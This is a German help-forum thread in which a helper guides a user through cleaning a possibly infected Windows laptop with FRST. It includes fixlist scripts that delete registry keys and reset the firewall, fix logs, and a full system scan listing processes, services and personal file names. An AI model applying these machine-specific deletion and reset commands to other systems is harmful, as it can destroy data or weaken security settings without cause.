HKEY_CURRENT_USER\Software\buskr51

HKEY_CURRENT_USER\Software\DATEV eG

HKEY_CURRENT_USER\Software\Deltaplan E-Mail V56

HKEY_CURRENT_USER\Software\FastViewer

HKEY_CURRENT_USER\Software\Google

HKEY_CURRENT_USER\Software\HP

HKEY_CURRENT_USER\Software\IM Providers

HKEY_CURRENT_USER\Software\Intel

HKEY_CURRENT_USER\Software\MediaHuman

HKEY_CURRENT_USER\Software\Microsoft

HKEY_CURRENT_USER\Software\Netscape

HKEY_CURRENT_USER\Software\ODBC

HKEY_CURRENT_USER\Software\Piriform

HKEY_CURRENT_USER\Software\Policies

HKEY_CURRENT_USER\Software\RegisteredApplications

HKEY_CURRENT_USER\Software\Selteco

HKEY_CURRENT_USER\Software\ShrewSoft

HKEY_CURRENT_USER\Software\TeamViewer

HKEY_CURRENT_USER\Software\Wow6432Node

HKEY_CURRENT_USER\Software\Classes
 

========= Ende von CMD: =========
 
 

========= netsh advfirewall reset =========
 

OK.
 
 

========= Ende von CMD: =========
 
 

=========== EmptyTemp: ==========
 

BITS transfer queue => 10510336 B

DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 71370235 B

Java, Flash, Steam htmlcache => 0 B

Windows/system/drivers => 7144946 B

Edge => 46093 B

Chrome => 50936185 B

Firefox => 0 B

Opera => 0 B
 

Temp, IE cache, history, cookies, recent:

Default => 0 B

Users => 0 B

ProgramData => 0 B

Public => 0 B

systemprofile => 0 B

systemprofile32 => 0 B

LocalService => 0 B

NetworkService => 272310 B

ITMueller => 143773872 B

buskr5 => 186967393 B
 

RecycleBin => 163111320 B

EmptyTemp: => 604.8 MB temporäre Dateien entfernt.
 

================================
 
 

Das System musste neu gestartet werden.
 

==== Ende von Fixlog 00:41:27 ====

Scripting/Repair mit FRST64

Kopiere den gesamten Inhalt der folgenden Code-Box:

Code:

Start:: DeleteValue: HKCU\Environment|buskr5 cmd: reg query "HKCU\Software\buskr5" /s cmd: reg query "HKCU\Software\buskr51" /s End::
Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
Gegebenenfalls muss dein Rechner neu gestartet werden.
Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Der Text im Fixlog war leider deutlich zu lang.

Ich hoffe im angehängten .zip ist es auch okay

Scripting/Repair mit FRST64

Kopiere den gesamten Inhalt der folgenden Code-Box:

Code:

Start:: DeleteKey: HKCU\Software\buskr5 DeleteKey: HKCU\Software\buskr51 End::
Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
Gegebenenfalls muss dein Rechner neu gestartet werden.
Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Code:

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021

durchgeführt von buskr5 (10-01-2021 01:21:30) Run:3

Gestartet von C:\Users\buskr5\Downloads

Geladene Profile: buskr5

Start-Modus: Normal

==============================================
 

fixlist Inhalt:

*****************

DeleteKey: HKCU\Software\buskr5

DeleteKey: HKCU\Software\buskr51
 

*****************
 

HKCU\Software\buskr5 => erfolgreich entfernt

HKCU\Software\buskr51 => erfolgreich entfernt
 

==== Ende von Fixlog 01:21:30 ====

Starte den Rechner mal neu und berichte ob das mit dem Onlinebanking jetzt weg ist. Und auch neue FRST-Logs.

Neu gestartet:

-> Keine Auffälligkeiten beim online Banking

Werden jetzt noch den Scan von MS Defender laufen lassen.

Bitte mach erstmal neue Logs. Den Defender kannst du immer noch laufen lassen.-

Code:

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021

durchgeführt von buskr5 (Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (10-01-2021 09:03:13)

Gestartet von C:\Users\buskr5\Downloads

Geladene Profile: buskr5

Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)

Standard-Browser: Chrome

Start-Modus: Normal
 

==================== Prozesse (Nicht auf der Ausnahmeliste) =================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
 

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe

(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe

(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe

(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe

(FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED) C:\Windows\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe

(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe

(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe

(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\Intel\Intel(R) Management Engine Components\LMS\LMS.exe

(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\jhi_service.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\GfxDownloadWrapper.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxCUIService.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHDCPSvc.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHeciSvc.exe

(Intel(R) Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe

(Learnpulse -> Learnpulse) C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe

(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe

(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe

(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\System32\upfc.exe

(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\iked.exe

(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe

(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
 

==================== Registry (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)

HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)

HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [Screenpresso] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe [18398304 2021-01-09] (Learnpulse -> Learnpulse)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)

HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]
 

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

Task: {08177AF7-895C-4CDE-BB61-C67AFF7D9DED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {1110DE16-C375-4BCA-B72F-AF617B0D8FFC} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {12C84621-CAA5-4F59-9214-474125FF1AE5} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)

Task: {19520EC2-6F12-4753-9C89-63BFAACB92B5} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {2AC510A4-884D-4FFB-9DD3-0C03B2C19EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)

Task: {62E7827E-C7E1-4C4E-8B46-FF865E056192} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)

Task: {76D7BBAC-71A9-42F5-AF51-1E7C1279F625} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)

Task: {7F233437-8600-49D7-858A-20C54C7C6662} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)

Task: {81A5CFF9-F6A7-420D-9945-4DA1E902C9A6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {9144CA0D-EED9-468E-8BEF-2311B88B92EC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {D67B4130-3DDC-43C9-B002-8ABDC0AB5DD0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1149336 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {DE27C544-B106-4C7D-9BF3-78CA0EA1F81A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
 
 

==================== Internet (Nicht auf der Ausnahmeliste) ====================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
 

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)

Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)

Tcpip\Parameters: [DhcpNameServer] 192.168.10.1

Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1

Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1

Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250

Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.10.1

Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1
 

Edge: 

======

DownloadDir: C:\Users\buskr5\Downloads

Edge DefaultProfile: Default

Edge Profile: C:\Users\buskr5\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-07]

Edge DownloadDir: C:\Users\buskr5\Downloads

Edge StartupUrls: Default -> "hxxp://google.de/"
 

FireFox:

========

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
 

Chrome: 

=======

CHR DefaultProfile: Default

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default [2021-01-10]

CHR Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-12-15]

CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]

CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-08]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-10]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-01-10]

CHR Extension: (Präsentationen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-09]

CHR Extension: (Docs) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-09]

CHR Extension: (Google Drive) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-09]

CHR Extension: (YouTube) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-09]

CHR Extension: (Tabellen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-09]

CHR Extension: (Google Docs Offline) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-09]

CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-09]

CHR Extension: (Google Mail) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-09]

CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-09]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-10]
 

==================== Dienste (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)

R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)

R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )

R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )

S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
 

===================== Treiber (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)

U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]

S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)

S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)

R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)

S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)

R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
 

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 
 

==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-10 09:03 - 2021-01-10 09:04 - 000019356 _____ C:\Users\buskr5\Downloads\FRST.txt

2021-01-09 18:10 - 2021-01-09 18:10 - 002281472 _____ (Farbar) C:\Users\buskr5\Downloads\FRST64.exe

2021-01-09 15:44 - 2021-01-09 15:44 - 000000000 ____D C:\WINDOWS\system32\appmgmt

2021-01-09 15:27 - 2021-01-09 15:27 - 000000000 ____D C:\Users\ITMueller\AppData\Local\PeerDistRepub

2021-01-09 15:09 - 2021-01-09 15:16 - 000031957 _____ C:\Users\ITMueller\Downloads\Addition.txt

2021-01-09 15:07 - 2021-01-09 15:16 - 000026221 _____ C:\Users\ITMueller\Downloads\FRST.txt

2021-01-09 15:05 - 2021-01-10 09:03 - 000000000 ____D C:\FRST

2021-01-09 15:05 - 2021-01-09 15:05 - 002282496 _____ (Farbar) C:\Users\ITMueller\Downloads\FRST64.exe

2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\Desktop\Verkn

2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Roaming\Apple Computer

2021-01-09 15:02 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Intel

2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html

2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg

2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575

2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner

2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf

2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf

2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf

2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule

2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi
 

==================== Ein Monat (geänderte) ==================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-10 09:02 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer

2021-01-10 09:02 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2021-01-10 09:02 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles

2021-01-10 09:01 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT

2021-01-10 09:01 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp

2021-01-10 09:01 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState

2021-01-10 09:01 - 2019-12-07 10:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI

2021-01-10 08:57 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy

